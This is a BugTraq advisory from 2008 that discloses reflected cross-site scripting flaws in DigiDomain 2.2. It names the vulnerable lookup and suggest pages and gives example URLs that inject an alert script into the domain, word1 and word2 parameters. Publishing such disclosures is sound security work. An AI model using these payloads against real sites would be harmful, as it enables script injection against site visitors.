BugTraq
Multiple XSS in DigiDomain Mar 27 2008 03:13AM
xx_hack_xx_2004 hotmail com
Hello

i'm re-posting this message from the actual message which was on Tue-29 May 2007 becuase my old message got live example ,

anyway :

Vulnerable : DigiDomain

Version: 2.2

web : http://www.digiappz.com

XSS :

1-

http://site.com/lookup/lookup_result.asp?domain=[XSS]&tld=.com

2-

http://www.site.com/lookup/suggest_result.asp?domain=.com&tld=&user=&sel
ecte=1&word1=[XSS]&word2=[XSS]

Example :

1-

http://site.com/lookup/lookup_result.asp?domain='><script>alert(1);</scr
ipt>&tld=.com

2-

http://www.site.com/lookup/suggest_result.asp?domain=.com&tld=&user=&sel
ecte=1&word1='><script>alert(1);</script>&word2='><script>alert(1);</scr
ipt>

Discovered By Linux_Drox

LeZr.Com

Best Regards ,,,

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus